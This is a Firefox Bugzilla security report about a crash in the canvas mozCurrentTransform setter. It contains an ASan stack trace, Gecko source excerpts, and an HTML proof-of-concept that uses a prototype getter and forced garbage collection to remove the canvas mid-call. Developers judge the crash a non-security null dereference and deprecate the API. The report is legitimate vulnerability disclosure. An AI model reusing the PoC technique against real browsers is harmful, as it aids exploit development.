Closed Bug 1780980 Opened 3 years ago Closed 1 years ago

Crash when handling CanvasRenderingContext2D::SetMozCurrentTransform

Categories

(Core :: Graphics: Canvas2D, defect)

Product:
Core
Component:
Graphics: Canvas2D
Type:
defect

Tracking

()

Status:
RESOLVED INCOMPLETE

People

(Reporter: jtjisgod, Unassigned)

References

Details

(Keywords: reporter-external, Whiteboard: [reporter-external] [client-bounty-form] [verif?])

Attachments

(1 file)

crash.html
688 bytes, text/html
Details
Attached file crash.html

Version: firefox-101.0a1.en-US.linux-x86_64-asan-reporter

AsanLog

=================================================================
==214031==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7feae25e45df bp 0x7ffef24d1250 sp 0x7ffef24d1140 T0)
==214031==The signal is caused by a READ memory access.
==214031==Hint: address points to the zero page.
    #0 0x7feae25e45df in mozilla::dom::CanvasRenderingContext2D::SetMozCurrentTransformInverse(JSContext*, JS::Handle<JSObject*>, mozilla::ErrorResult&) /builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp:2137:16
    #1 0x7feae0fc6979 in mozilla::dom::CanvasRenderingContext2D_Binding::set_mozCurrentTransformInverse(JSContext*, JS::Handle<JSObject*>, void*, JSJitSetterCallArgs) /builds/worker/workspace/obj-build/dom/bindings/CanvasRenderingContext2DBinding.cpp:2122:24
    #2 0x7feae240d7c5 in bool mozilla::dom::binding_detail::GenericSetter<mozilla::dom::binding_detail::NormalThisPolicy>(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3218:8
    #3 0x7feaebefe550 in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:420:13
    #4 0x7feaebefe550 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:507:12
    #5 0x7feaebf00e61 in InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:574:10
    #6 0x7feaebf00e61 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:605:8
    #7 0x7feaebf037f8 in js::CallSetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::Value>) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:746:10
    #8 0x7feaec280e14 in SetExistingProperty(JSContext*, JS::Handle<JS::PropertyKey>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<js::NativeObject*>, js::PropertyResult const&, JS::ObjectOpResult&) /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2490:8
    #9 0x7feaec27e18e in bool js::NativeSetProperty<(js::QualifiedBool)1>(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<JS::PropertyKey>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2524:14
    #10 0x7feaebee4e7e in SetProperty /builds/worker/checkouts/gecko/js/src/vm/ObjectOperations-inl.h:308:10
    #11 0x7feaebee4e7e in SetObjectElementOperation /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:1817:10
    #12 0x7feaebee4e7e in Interpret(JSContext*, js::RunState&) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3075:12
    #13 0x7feaebed3e47 in js::RunScript(JSContext*, js::RunState&) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:389:13
    #14 0x7feaebefe7b1 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:539:13
    #15 0x7feaebf00e61 in InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:574:10
    #16 0x7feaebf00e61 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:605:8
    #17 0x7feaec0362b9 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp:117:10
    #18 0x7feae1e3d83c in mozilla::dom::EventHandlerNonNull::Call(mozilla::dom::BindingCallContext&, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/obj-build/dom/bindings/EventHandlerBinding.cpp:266:37
    #19 0x7feae2faee7d in Call<nsCOMPtr<mozilla::dom::EventTarget> > /builds/worker/workspace/obj-build/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #20 0x7feae2faee7d in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/checkouts/gecko/dom/events/JSEventHandler.cpp:201:12
    #21 0x7feae2f61de6 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/checkouts/gecko/dom/events/EventListenerManager.cpp:1316:22
    #22 0x7feae2f63def in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/checkouts/gecko/dom/events/EventListenerManager.cpp:1507:17
    #23 0x7feae2f4b744 in HandleEvent /builds/worker/checkouts/gecko/dom/events/EventListenerManager.h:395:5
    #24 0x7feae2f4b744 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp:348:17
    #25 0x7feae2f496e0 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp:550:16
    #26 0x7feae2f4fe13 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp:1119:11
    #27 0x7feae6ad66f6 in mozilla::PresShell::EventHandler::DispatchEventToDOM(mozilla::WidgetEvent*, nsEventStatus*, nsPresShellEventCB*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:8685:7
    #28 0x7feae6ad36bd in mozilla::PresShell::EventHandler::DispatchEvent(mozilla::EventStateManager*, mozilla::WidgetEvent*, bool, nsEventStatus*, nsIContent*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:8257:7
    #29 0x7feae6aca5cb in mozilla::PresShell::EventHandler::HandleEventWithCurrentEventInfo(mozilla::WidgetEvent*, nsEventStatus*, bool, nsIContent*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:8189:17
    #30 0x7feae6ad0ad7 in mozilla::PresShell::EventHandler::HandleEventWithTarget(mozilla::WidgetEvent*, nsIFrame*, nsIContent*, nsEventStatus*, bool, nsIContent**, nsIContent*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:8097:17
    #31 0x7feae2eab7d5 in HandleEventWithTarget /builds/worker/workspace/obj-build/dist/include/mozilla/PresShell.h:655:25
    #32 0x7feae2eab7d5 in mozilla::EventStateManager::InitAndDispatchClickEvent(mozilla::WidgetMouseEvent*, nsEventStatus*, mozilla::EventMessage, mozilla::PresShell*, nsIContent*, AutoWeakFrame, bool, nsIContent*) /builds/worker/checkouts/gecko/dom/events/EventStateManager.cpp:5238:29
    #33 0x7feae2eac047 in mozilla::EventStateManager::DispatchClickEvents(mozilla::PresShell*, mozilla::WidgetMouseEvent*, nsEventStatus*, nsIContent*, nsIContent*) /builds/worker/checkouts/gecko/dom/events/EventStateManager.cpp:5340:17
    #34 0x7feae2ea55ec in mozilla::EventStateManager::PostHandleMouseUp(mozilla::WidgetMouseEvent*, nsEventStatus*, nsIContent*) /builds/worker/checkouts/gecko/dom/events/EventStateManager.cpp:5283:17
    #35 0x7feae2ea30fa in mozilla::EventStateManager::PostHandleEvent(nsPresContext*, mozilla::WidgetEvent*, nsIFrame*, nsEventStatus*, nsIContent*) /builds/worker/checkouts/gecko/dom/events/EventStateManager.cpp:3569:18
    #36 0x7feae6ad3a56 in mozilla::PresShell::EventHandler::DispatchEvent(mozilla::EventStateManager*, mozilla::WidgetEvent*, bool, nsEventStatus*, nsIContent*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:8271:30
    #37 0x7feae6aca5cb in mozilla::PresShell::EventHandler::HandleEventWithCurrentEventInfo(mozilla::WidgetEvent*, nsEventStatus*, bool, nsIContent*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:8189:17
    #38 0x7feae6ac92ce in mozilla::PresShell::EventHandler::HandleEventUsingCoordinates(nsIFrame*, mozilla::WidgetGUIEvent*, nsEventStatus*, bool) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:7107:30
    #39 0x7feae6ac6e8b in mozilla::PresShell::EventHandler::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:6910:12
    #40 0x7feae6ac5760 in mozilla::PresShell::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:6853:23
    #41 0x7feae61380fd in nsViewManager::DispatchEvent(mozilla::WidgetGUIEvent*, nsView*, nsEventStatus*) /builds/worker/checkouts/gecko/view/nsViewManager.cpp:685:18
    #42 0x7feae6137a87 in nsView::HandleEvent(mozilla::WidgetGUIEvent*, bool) /builds/worker/checkouts/gecko/view/nsView.cpp:1129:9
    #43 0x7feae61d6487 in mozilla::widget::PuppetWidget::DispatchEvent(mozilla::WidgetGUIEvent*, nsEventStatus&) /builds/worker/checkouts/gecko/widget/PuppetWidget.cpp:354:37
    #44 0x7feaded8d7b0 in mozilla::layers::APZCCallbackHelper::DispatchWidgetEvent(mozilla::WidgetGUIEvent&) /builds/worker/checkouts/gecko/gfx/layers/apz/util/APZCCallbackHelper.cpp:502:21
    #45 0x7feae520ca43 in DispatchWidgetEventViaAPZ /builds/worker/checkouts/gecko/dom/ipc/BrowserChild.cpp:1777:10
    #46 0x7feae520ca43 in mozilla::dom::BrowserChild::HandleRealMouseButtonEvent(mozilla::WidgetMouseEvent const&, mozilla::layers::ScrollableLayerGuid const&, unsigned long const&) /builds/worker/checkouts/gecko/dom/ipc/BrowserChild.cpp:1740:3
    #47 0x7feae520be36 in mozilla::dom::BrowserChild::ProcessPendingCoalescedMouseDataAndDispatchEvents() /builds/worker/checkouts/gecko/dom/ipc/BrowserChild.cpp:1568:7
    #48 0x7feae520f1aa in mozilla::dom::BrowserChild::RecvRealMouseButtonEvent(mozilla::WidgetMouseEvent const&, mozilla::layers::ScrollableLayerGuid const&, unsigned long const&) /builds/worker/checkouts/gecko/dom/ipc/BrowserChild.cpp:1704:5
    #49 0x7feae53c9920 in mozilla::dom::PBrowserChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/obj-build/ipc/ipdl/PBrowserChild.cpp:5719:56
    #50 0x7feae54b2b02 in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/obj-build/ipc/ipdl/PContentChild.cpp:8837:32
    #51 0x7feaddec49bf in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1705:25
    #52 0x7feaddec1ae3 in mozilla::ipc::MessageChannel::DispatchMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message&&) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1630:9
    #53 0x7feaddec357d in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1526:14
    #54 0x7feadc5ae650 in mozilla::RunnableTask::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:467:16
    #55 0x7feadc567ef3 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock<mozilla::Mutex&> const&) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:780:26
    #56 0x7feadc5648a8 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock<mozilla::Mutex&> const&) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:612:15
    #57 0x7feadc564fbc in mozilla::TaskController::ProcessPendingMTTask(bool) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:390:36
    #58 0x7feadc5b86b4 in operator() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:127:37
    #59 0x7feadc5b86b4 in mozilla::detail::RunnableFunction<mozilla::TaskController::InitializeInternal()::$_1>::Run() /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:531:5
    #60 0x7feadc58f43d in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1180:16
    #61 0x7feadc59b501 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:465:10
    #62 0x7feaddecd43b in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:107:5
    #63 0x7feaddd1b462 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:380:10
    #64 0x7feaddd1b462 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:373:3
    #65 0x7feaddd1b462 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:355:3
    #66 0x7feae627126a in nsBaseAppShell::Run() /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:137:27
    #67 0x7feaebb149ff in XRE_RunAppShell() /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:877:20
    #68 0x7feaddd1b462 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:380:10
    #69 0x7feaddd1b462 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:373:3
    #70 0x7feaddd1b462 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:355:3
    #71 0x7feaebb1369a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:736:34
    #72 0x560b304e4574 in content_process_main /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:57:28
    #73 0x560b304e4574 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:327:18
    #74 0x7feaf56c70b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
    #75 0x560b30423e78 in _start (/home/jtjisgod/Desktop/firefox/files/2022_05_firefox-101.0a1.en-US.linux-x86_64-asan-reporter/firefox/firefox-bin+0xb1e78) (BuildId: 27474999a494e4881eb40d5c1e6f6411aa595bc8)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp:2137:16 in mozilla::dom::CanvasRenderingContext2D::SetMozCurrentTransformInverse(JSContext*, JS::Handle<JSObject*>, mozilla::ErrorResult&)
==214031==ABORTING

x86-64
mozilla-central-asan-nightly
101.0a1-20220501092542-https://hg.mozilla.org/mozilla-central/rev/f0fda878f51a5f5aaa7ed422e9062f5bfa0e8148
Flags: sec-bounty?

Asan is saying it is a Null Dereference, but it looks like UAF to me.

Description

[1] CanvasRenderingContext2D::SetMozCurrentTransform is triggered by canvas.getContext('2d').mozCurrentTransform = arr1.
[2] ObjectToMatrix in CanvasRenderingContext2D.cpp is [3] called from SetMozCurrentTransform and SetMozCurrentTransformInverse.
Finally, ObjectToMatrix is [4] calling JS_GetElement which function can execute Javascript.

Alloc
<canvas id="my-house" width="300" height="300"></canvas>

Free
The canvas will be deleted and freed in Array's defineGetter which is called by JS_GetElement.

Use

void CanvasRenderingContext2D::SetMozCurrentTransform(
    JSContext* aCx, JS::Handle<JSObject*> aCurrentTransform,
    ErrorResult& aError) {
  EnsureTarget();
  if (!IsTargetValid()) {
    aError.Throw(NS_ERROR_FAILURE);
    return;
  }

  Matrix newCTM;
  if (ObjectToMatrix(aCx, aCurrentTransform, newCTM, aError) &&
      newCTM.IsFinite()) {
    mTarget->SetTransform(newCTM); // Here
  }
}

[1] https://searchfox.org/mozilla-central/source/dom/canvas/CanvasRenderingContext2D.cpp#2076
[2] https://searchfox.org/mozilla-central/source/dom/canvas/CanvasRenderingContext2D.cpp#2045
[3] https://searchfox.org/mozilla-central/source/dom/canvas/CanvasRenderingContext2D.cpp#2086
[4] https://searchfox.org/mozilla-central/source/dom/canvas/CanvasRenderingContext2D.cpp#2059

Group: firefox-core-security → core-security
Component: Security → Graphics: Canvas2D
Product: Firefox → Core
Group: core-security → gfx-core-security

Do you have a stack for where the free is occuring? Why are you sure that the defineGetter call is actually causing the canvas to be freed? This sort of issue is quite common, so we usually root objects on the stack so they won't be freed by these callbacks. I'm not saying we never fail to root things in this way, but I think it usually shows up in ASan. Do you have a particular unrooted stack reference in mind that you think could be causing a use-after-free?

Flags: needinfo?(jtjisgod)

It may be a wrong guess because I'm still a beginner.

I didn't check the free with debugger, but I guessed defineGetter is calling my javascript code which is remove canvas object.
I think the canvas object has mTarget, which is freed at the function.

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
</head>
<body>
<button onclick="f()">ClickMe!</button>
<div id="canvas_wrapper">
	CANVAS
	<canvas id="my-house" width="300" height="300"></canvas>
</div>
<script>
	GC = function() {
		for (var i = 0; i < 0x200000; ++i) {
			var s = new String('AAAA');
		}
	};
	canvas = document.getElementById('my-house');
	arr1=[,1,1,1,1,1];
	arr1.__proto__.__defineGetter__(0, function(x){
		canvas = null;
		document.getElementById("canvas_wrapper").innerHTML = "Removed" // Remove Canvas
		GC() 
		alert()
		return 1
	});
	function f() {
		canvas.getContext('2d').mozCurrentTransform = arr1
	}
</script>
</body>
</html>
Flags: needinfo?(jtjisgod)

I've confirmed that the bug occurs even if I just put an alert without removing the innerHTML.
As you said, defineGetter is not free the object, but any mechanism freed the object.

CanvasRenderingContext2D's dtor is calling Reset(), the function is setting null mTarget to nullptr.
So I guessed the CanvasRenderingContext2D object was freed.

nsresult CanvasRenderingContext2D::Reset() {
  if (mCanvasElement) {
    mCanvasElement->InvalidateCanvas();
  }

  // only do this for non-docshell created contexts,
  // since those are the ones that we created a surface for
  if (mTarget && IsTargetValid() && !mDocShell) {
    gCanvasAzureMemoryUsed -= mWidth * mHeight * 4;
  }

  bool forceReset = true;
  ReturnTarget(forceReset);
  mTarget = nullptr;
  mBufferProvider = nullptr;

  // Since the target changes the backing texture will change, and this will
  // no longer be valid.
  mIsEntireFrameInvalid = false;
  mPredictManyRedrawCalls = false;
  mFrameCaptureState = FrameCaptureState::CLEAN;

  return NS_OK;
}

firefox-101.0a1.en-US.linux-x86_64-asan-reporter

We do appreciate you testing Nightly builds ("0a1") but Firefox 101 is 4 months old at this point. Can you reproduce this in Firefox 105.0a1? We tried using your testcase and could not.

ASAN nightly builds should self-update. If yours are somehow stuck on old versions please contact the folks in the #fuzzing channel on https://chat.mozilla.org/

Flags: needinfo?(jtjisgod)

I'm using Mozilla's asan-report build.
The mozCurrentTransform will be dedicated. So any high version Firefox can't trigger the bug even if Firefox 102 nightly build.

But, This bug is reproduced in Mac OS with Firefox 102 release version. (latest)

Flags: needinfo?(jtjisgod)

The mozCurrentTransform will be deprecated. So any high version Firefox can't trigger the bug, even Firefox 102 nightly build.
But, This bug is reproduced in Mac OS with Firefox 102, 103 release version.

In a release build it's a null deref: bp-55d8e59c-4110-452d-a13e-bb9ce0220803 (which doesn't mean it's not potentially worse as detected by ASAN). In this case, however, ASAN is also not detecting a UAF and that's usually pretty reliable. I'm not sure your theory holds up about the re-use, but asking some of the devs who are trying to deprecate this.

I assume we're deprecating mozCurrentTransform because of the moz prefix, which typically means something is now an adopted standard. It's possible the standard behavior is different, but did you try this with the standard transform?

Flags: needinfo?(mathew.hodson)
Flags: needinfo?(emilio)
Flags: needinfo?(jtjisgod)

It's a null deref, I think, we're clearing the target after checking for it, which is a bug, but not a security issue afaict. Bug 1782651 was submitted literally two days ago. I just pushed to let the removal ride the trains.

The fix could be just swapping the order of ConvertToMatrix and EnsureTarget, but it's probably not worth fixing unless we think there's a real security impact. If you need an upliftable patch I could do that tho.

Depends on: 1782651
Flags: needinfo?(emilio)

I didn't know who else needed to look at bug 1782651 so I also added :jrmuizel as a reviewer. Please land the patch for me when everything is ready.

Flags: needinfo?(mathew.hodson)

Sounds like a null deref, so I'll unhide this.

Group: gfx-core-security
Flags: sec-bounty? → sec-bounty-

A needinfo is requested from the reporter, however, the reporter is inactive on Bugzilla. Closing the bug as incomplete.

For more information, please visit BugBot documentation.

Status: UNCONFIRMED → RESOLVED
Closed: 1 years ago
Flags: needinfo?(jtjisgod)
Resolution: --- → INCOMPLETE
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: